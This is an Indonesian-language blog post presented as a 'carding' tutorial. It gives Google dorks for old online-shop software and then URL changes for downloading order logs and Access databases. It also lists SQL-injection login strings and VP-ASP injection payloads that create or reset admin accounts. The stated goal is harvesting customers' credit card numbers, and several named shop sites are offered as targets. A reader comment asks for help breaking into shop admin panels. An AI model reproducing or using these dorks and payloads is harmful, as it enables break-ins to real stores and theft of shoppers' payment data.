Ini ada sedikit banyak Kumpulan Contoh Dari Shop Admin atau Dengan bahasa Lain Carding...
Contoh bugs pada bentuk toko system : shopadmin
Ketik keyword google : allinurl:/shopadmin.asp
Contoh target : www.Target.com/shopadmin.asp
user : ‘or’1
pass : ‘or’1
Contoh bugs pada bentuk toko sistem : Index CGI
Ketik keyword google : allinurl:/store/index.cgi/page=
Contoh target : http://www.Target.com/cgi-bin/store/…short_blue.htm
Hapus short_blue.htm dan ganti dengan :./admin/files/order.log
Hasilnya:http://www.Target.com/cgi-bin/store/…iles/order.log
Contoh bugs pada bentuk toko sistem : metacart
Ketik keyword google.com : allinurl:/metacart/
Contoh target : www.Target.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan : –> /database/metacart.mdb
Hasilnya : /www.Target.com/metacart/database/metacart.mdb
Contoh bugs pada bentuk toko sistem CShop
Ketik keyword google.com : allinurl:/DCShop/
Contoh : www.Target.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan
/DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : www.Target.com/xxxx/DCShop/orders/orders.txt
Contoh bugs pada bentuk toko sistem : EShop
Ketik keyword google.com : allinurl:/eshop/
Contoh : www.Target.com/xxxxx/eshop
Hapus /eshop dan ganti dengan : /cg-bin/eshop/database/order.mdb
Hasilnya : http://www.Target.com/…/cg-bin/esh…base/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
Contoh bugs pada bentuk toko sistem : PDshopro
Ketik keyword google.com : allinurl:/shop/category.asp/catid=
Contoh : www.Target.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxxx dang ganti dengan : /admin/dbsetup.asp
Hasilnya : www.Target.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.Target.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
Contoh bugs pada bentuk toko sistem : commerceSQL
Ketik keyword google.com : allinurl:/commercesql/
Contoh : www.Target.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan: cgi-bin/commercesql/index.cgi?page=
Hasilnya : http://www.Target.com/cgi-bin/commer…ndex.cgi?page=
Untuk melihat admin config
http://www.Target.com/cgi-bin/commer…/admin_conf.pl
Untuk melihat admin manager
http://www.Target.com/cgi-bin/commer…in/manager.cgi
Untuk melihat file log/CCnya
http://www.Target.com/cgi-bin/commer…iles/order.log
Contoh bugs pada bentuk toko sistem : Cart32 v3.5a
Ketik keyword google.com : allinurl:/cart32.exe/
Contoh : http://www.Target.net/wrburns_s/cgi-…xe/NoItemFound
Ganti NoItemFound dengan : error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format
/akhiran.c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www. Target.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.Target.com/cart32/
Contoh http://www.Target.net/wrburns_s/cgi-…RNS-001065.c32
Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
Ketik keyword google.com : allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://Target.com/vpasp/shopdisplayp…39;a%25′–
Gantilah nilai dari string url terakhir dg:
: %20′a%25′–
: %20′b%25′–
: %20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://Target.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
Ketik keyword google.com : Ketik –> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://Target/vpasp/shopadmin.asp
Contoh bugs pada bentuk toko sistem : Lobby.asp
Ketik keyword google.com : allinurl: Lobby.asp
Contoh : www.Target.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan : fpdb/shop.mdb
Hasilnya : www.Target.com/fpdb/shop.mdb
Contoh bugs pada bentuk toko sistem : Shopper.cgi
Ketik keyword google.com : allinurl: /cgi-local/shopper.cgi
Contoh : http://www.Target.com/cgi-local/shop…dd=action&key=
Tambah dengan :…&template=order.log
Hasilnya :
http://www.xxxxxxxx.com/cgi-local/sh…late=order.log
Contoh bugs pada bentuk toko sistem :Proddetail.asp
Ketik keyword google.com : allinurl [Stick Out Tongue] roddetail.asp?prod=
Contoh : http://www.Target.org/proddetail.asp…ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369
dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : www.Target.org/fpdb/vsproducts.mdb
Contoh bugs pada bentuk toko sistem [Big Grin] igishop
Ketik keyword google.com : inurl:”/cart.php?m=”
Contoh : http://Target.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view
dan ganti dengan –>admin
Hasilnya http://Target.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection
Usename : ‘or”=”
Password : ‘or”=”
setelah bisa login, cari data yang diperlukan .
Contoh bugs pada bentuk toko sistem : Index CGI
Ketik keyword google.com : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/…ir_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/…iles/order.log
trus copy-paste tuch log’nya di notepad biar gampang di baca
Contoh bugs pada bentuk toko sistem : Index Cart
Ketik keyword google.com : inurl:”/cart.php?m=”
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :’or”=”
Passwordnya :’or”=”
contoh target buat kalian :
https://www.therustybucket.biz/store/admin
Contoh bugs pada bentuk toko sistem : Index cart
Ketik keyword google.com : /ashopKart20/”
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example www.garrysun.com/ashopkart20/addprod.asp
Injection : selanjutnya masukin bugs di atas jadi : www.garrysun.com/ashopkart20/admin/scart.mdb
kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces
Contoh bugs pada bentuk toko sistem : Catid
Ketik keyword google.com : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp
kalo berhasil dapet file.mdb trus buka pake MS - Access tapi kalo gagal berarti
dah keduluan ma carder yang lain… cari target lain ok..??
Contoh bugs pada bentuk toko sistem : Store
Ketik keyword google.com : inurl:”/store/proddetail.asp?prod=”
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
Example : http://www.successlink.org/store/pro…prod=SL-IP0001
masukin bugsnya www.successlink.org/store/fpdb/vsproducts.mdb
download file .mdbnya trus buka pake MS- ACCESS..
Contoh bugs pada bentuk toko sistem : Sunshop
Ketik keyword google.com : “Powered by SunShop 3.2″
Atau google dork : inurl:”/sunshop/index.php?action=”
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik “OK” aja
Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
ganti dengan admin http ://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :’or”=’
Contoh bugs pada bentuk toko sistem : digishop
Ketik keyword google.com
Ketik keyword google.com : “Powered by Digishop 3.2″
Bugs : hapus tulisan cart.php?m= dengan admin
Login pake SQL Injection :
Username : ‘or”=”
Password : ‘or”=”
Contoh target :
http://uniquescrapbooks.com.au/store/admin
http://www.7footserb.com/shop/admin
https://www.tangerineclothing.com/admin
Contoh bugs pada bentuk toko sistem :Lobby
Ketik keyword google.com : inurl:”mall/lobby.asp”
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page - Search our Inventory
jadi http://www.gemdepot.com/fpdb/shop.mdb
dapat dech .mdb ===> trus klik open database JANGAN klik “convert databese” ===> klk view orders ====> trus cari orang yg pernah belanja contoh pada customer no 36 trus dimana no CCnya badKiddes….
sabar - sabar Oiii… masih di table customer no 36 then klik payment
Subscribe to:
Post Comments (Atom)
Posting Free Download
- Ansav Antivirus
- BitDefender Anti Virus
- Download MySQL Front
- Driver Toshiba-Asia Support
- DVD Repositori openSUSE 11.0
- Embellish Text Photoshop
- Free Ajax Tutorial
- FREE antivirus software - avast! Home Edition
- Free Download Antivirus PCMAV 2.0a
- Free Ebook J2SE
- Free Ebook Linux
- Free Mysql Download Manual
- Free Tutorial C#
- Free version AVG Anti-Virus
- Free Wallpaper 3D and Picture
- Free Wallpaper Car Ferrari
- Free Wallpaper Dragonball Z
- Free Wallpaper inuyasha 1 800
- Free Wallpaper Linux
- Free Wallpaper Mac
- Free Wallpaper Windows
- Free Wallpaper Windows Vista
- Hacking Tutorial
- Java AWT Reference In PDF Format
- Kernel Linux v 2.6.x
- Linux Dasar dari Onno W. Purbo
- Master FreeBSD 7.0
- Master Linux Slackware-12.2
- Master Linux Ubuntu 8.10
- Master OpenOffice 3.0.1
- Master OpenSUSE 11.1
- Master Vektor Linux 5.9
- MySQL Presentations File PDF
- MySql Tutorial in Windows
- New WordPress Themes Template
- Open Source for Windows part 1
- Open Source for Windows part 2
- PC Tools AntiVirus™ 6 for Windows®
- php Tutorial
- Shop Admin Tutorial Carding
- Triggers and Stored Procedures
- Tutorial complete of php injection for BEGINNING
- Tutorial dari Onno W. Purbo
- Tutorial e-commerce dari Onno W. Purbo
- Tutorial Education dari Onno W. Purbo
- Tutorial Internate Cafe dari Onno W. Purbo
- Tutorial Java CSLib and Master Program
- Tutorial Media dari Onno W. Purbo
- Tutorial Microelectronics dari Onno W. Purbo
- Tutorial MySQL 5 Trigger Before Insert
- Tutorial Network Security dari Onno W. Purbo
- Tutorial Networking dari Onno W. Purbo
- Tutorial Physical dari Onno W. Purbo
- Tutorial RDMS MySQL
- Tutorial Voip dari Onno W. Purbo
- Tutorial Wireless dari Onno W. Purbo
- Video tutorial Hacking
- Wordpress Themes Templates
INDOCOM SPONSOR TO FIND A HOTEL
Categories Download
- Networking (18)
- Driver (11)
- MySQL (9)
- Tutorial Linux (9)
- Tutorial Education (8)
- Wallpaper (8)
- Free Mp3 (7)
- Hacking (7)
- Antivirus (6)
- ISO Linux (6)
- software for windows (6)
- Software in Linux (5)
- E-Book (4)
- Tutorial php (4)
- Java (3)
- Template (3)
- Ajax (2)
- Contoh Proposal (2)
- Oracle (2)
- e-commerce (2)
- lain-lain (2)
- Beasiswa (1)
- Blog (1)
- C# (1)
- Driver Toshiba (1)
- Info Lomba (1)
- Photoshop Cs (1)
- Tutorial Voip (1)
- Tutorial Wireless (1)
- VB (1)
mantab gan..ane pengen blajar banyak nih..
ReplyDeletecmn sulit buat masuk ke shop admin..
ane bingung mau buat nembus username and pass nya..
mohon pencerahan donk gan..
hub ane via email donk.
didie.yudhistira@gmail.com